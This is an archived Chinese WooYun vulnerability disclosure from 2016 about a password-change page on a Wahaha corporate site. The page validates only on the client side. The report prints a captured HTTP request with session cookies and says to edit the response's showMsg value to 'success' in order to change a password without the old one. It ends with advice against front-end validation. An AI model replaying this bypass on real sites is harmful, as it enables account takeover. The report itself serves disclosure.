乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-22: 细节已通知厂商并且等待厂商处理中 2016-01-27: 厂商已经主动忽略漏洞,细节向公众公开
RT
因为哇哈哈用的前段验证,所以这个有的玩~修改密码处
抓包
POST /wahaha/useredit.html HTTP/1.1Host: edison.wahaha.com.cnContent-Length: 134Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://edison.wahaha.com.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://edison.wahaha.com.cn/wahaha/useredit.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=756A97BD0F44191F52671368810E962A; JSESSIONID=FA5141623D0D00AC780F376FC9F6E55E; CNZZDATA4186937=cnzz_eid%3D1895738471-1453371978-http%253A%252F%252Fedison.wahaha.com.cn%252F%26ntime%3D1453371978type=SAVE&id=9%2C411&mobile=13888888888&loginId=Rand0m&orginLoginPw=hahadasdaasasdsadad&loginPw=aaaaaa&loginPwConfirm=aaaaaa&x=36&y=22
密码是随意输入的发送request,forward掉
把showMsg后面括号的值改成success即可
就这样咯
这样的例子好多大厂商还蛮多的,不要用前端验证
危害等级:无影响厂商忽略
忽略时间:2016-01-27 11:00
漏洞Rank:4 (WooYun评价)
暂无